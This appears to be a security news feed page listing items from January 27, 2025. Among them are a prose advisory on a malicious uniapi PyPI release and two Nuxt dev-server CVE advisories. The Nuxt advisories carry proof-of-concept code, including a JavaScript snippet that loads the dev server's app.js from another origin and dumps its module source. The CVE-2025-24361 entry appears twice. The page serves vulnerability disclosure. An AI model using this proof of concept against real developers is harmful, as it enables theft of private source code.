![]() |
Description: We thank participants and look forward to sharing what we've learned
January 27th, 2025 (5 months ago)
|
![]() |
Description: Whether you're facing growing data demands and increased cyber threats, or simply looking to future-proof your business, it's time to consider the long-term benefits of transitioning to a cloud-first infrastructure.
January 27th, 2025 (5 months ago)
|
![]() |
Description: In this special interview episode of the 404 Media Podcast, Sam talks to Alexzandra Kekesi, VP of Brand and Community at Pornhub, about age verification laws and what she's hearing from adult performers.
January 27th, 2025 (5 months ago)
|
![]() |
Description: Welcome to your weekly cybersecurity scoop! Ever thought about how the same AI meant to protect our hospitals could also compromise them? This week, we’re breaking down the sophisticated world of AI-driven threats, key updates in regulations, and some urgent vulnerabilities in healthcare tech that need our attention.
As we unpack these complex topics, we'll equip you with sharp insights to
January 27th, 2025 (5 months ago)
|
![]() |
January 27th, 2025 (5 months ago)
|
![]() |
Description: uniapi version 1.0.7 introduces code that would execute on import of the module and download a script from a remote URL, and would then execute the downloaded script in a thread. The downloaded script would harvest system information and POST the information to another remote URL. This code was found in the PyPI release artifacts and was not present in the public GitHub repository.
References
https://github.com/pypa/advisory-database/tree/main/vulns/uniapi/PYSEC-2025-2.yaml
https://inspector.pypi.io/project/uniapi/1.0.7/packages/0f/40/c6e06c22bbc22ef45f40bf5a7711763fa08fec4d16b4718d86fd60970131/uniapi-1.0.7.tar.gz/uniapi-1.0.7/uniapi/__init__.py#line.11
https://github.com/advisories/GHSA-gvvw-rr8m-fj76
January 27th, 2025 (5 months ago)
|
CVE-2025-24360 |
Description: Summary
Nuxt allows any websites to send any requests to the development server and read the response due to default CORS settings.
Details
While Vite patched the default CORS settings to fix https://github.com/vitejs/vite/security/advisories/GHSA-vg6x-rcgg-rjx6, nuxt uses its own CORS handler by default (https://github.com/nuxt/nuxt/pull/23995).
https://github.com/nuxt/nuxt/blob/7d345c71462d90187fd09c96c7692f306c90def5/packages/vite/src/client.ts#L257-L263
That CORS handler sets Access-Control-Allow-Origin: *.
[!IMPORTANT]If on an affected version, it may be possible to opt-out of the default Nuxt CORS handler by configuring vite.server.cors.
PoC
Start a dev server in any nuxt project using Vite by nuxt dev.
Send a fetch request to http://localhost:3000/_nuxt/app.vue (fetch('http://localhost:3000/_nuxt/app.vue')) from a different origin page.
Impact
Users with the default server.cors option using Vite builder may get the source code stolen by malicious websites
Additional Information
/__nuxt_vite_node__/manifest / /__nuxt_vite_node__/module also seems to have Access-Control-Allow-Origin: *, so it maybe also possible to exploit that handler.
https://github.com/nuxt/nuxt/blob/7d345c71462d90187fd09c96c7692f306c90def5/packages/vite/src/vite-node.ts#L39
Although I didn't find a valid module id.
Note that this handler is probably also vulnerable to DNS rebinding attacks as I didn't find any host header checks.
References
https://github.com/nuxt/nuxt/security/advisories/GHS...
CVSS: MEDIUM (5.3) EPSS Score: 0.04%
January 27th, 2025 (5 months ago)
|
CVE-2025-24361 |
Description: Summary
Source code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.
Details
Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:3000/_nuxt/app.js"> in their site and run the script.
By using Function::toString against the values in window.webpackChunknuxt_app, the attacker can get the source code.
PoC
Create a nuxt project with webpack / rspack builder.
Run npm run dev
Open http://localhost:3000
Run the script below in a web site that has a different origin.
You can see the source code output in the document and the devtools console.
const script = document.createElement('script')
script.src = 'http://localhost:3000/_nuxt/app.js'
script.addEventListener('load', () => {
for (const page in window.webpackChunknuxt_app) {
const moduleList = window.webpackChunknuxt_app[page][1]
console.log(moduleList)
for (const key in moduleList) {
const p = document.createElement('p')
const title = document.createElement('strong')
title.textContent = key
const code = document.createElement('code')
code.textContent = moduleList[key].toString()
p.append(title, ':', document.createElement('br'), code)
document.body.appendChild(p)
}
}
})
document.head.appendChild(script)
It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in t...
CVSS: MEDIUM (5.3) EPSS Score: 0.04%
January 27th, 2025 (5 months ago)
|
CVE-2025-24361 |
Description: Summary
Source code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.
Details
Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:3000/_nuxt/app.js"> in their site and run the script.
By using Function::toString against the values in window.webpackChunknuxt_app, the attacker can get the source code.
PoC
Create a nuxt project with webpack / rspack builder.
Run npm run dev
Open http://localhost:3000
Run the script below in a web site that has a different origin.
You can see the source code output in the document and the devtools console.
const script = document.createElement('script')
script.src = 'http://localhost:3000/_nuxt/app.js'
script.addEventListener('load', () => {
for (const page in window.webpackChunknuxt_app) {
const moduleList = window.webpackChunknuxt_app[page][1]
console.log(moduleList)
for (const key in moduleList) {
const p = document.createElement('p')
const title = document.createElement('strong')
title.textContent = key
const code = document.createElement('code')
code.textContent = moduleList[key].toString()
p.append(title, ':', document.createElement('br'), code)
document.body.appendChild(p)
}
}
})
document.head.appendChild(script)
It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in t...
CVSS: MEDIUM (5.3) EPSS Score: 0.04%
January 27th, 2025 (5 months ago)
|
![]() |
Description: The Open Web Application Security Project has recently introduced a new Top 10 project - the Non-Human Identity (NHI) Top 10. For years, OWASP has provided security professionals and developers with essential guidance and actionable frameworks through its Top 10 projects, including the widely used API and Web Application security lists.
Non-human identity security represents an emerging
January 27th, 2025 (5 months ago)
|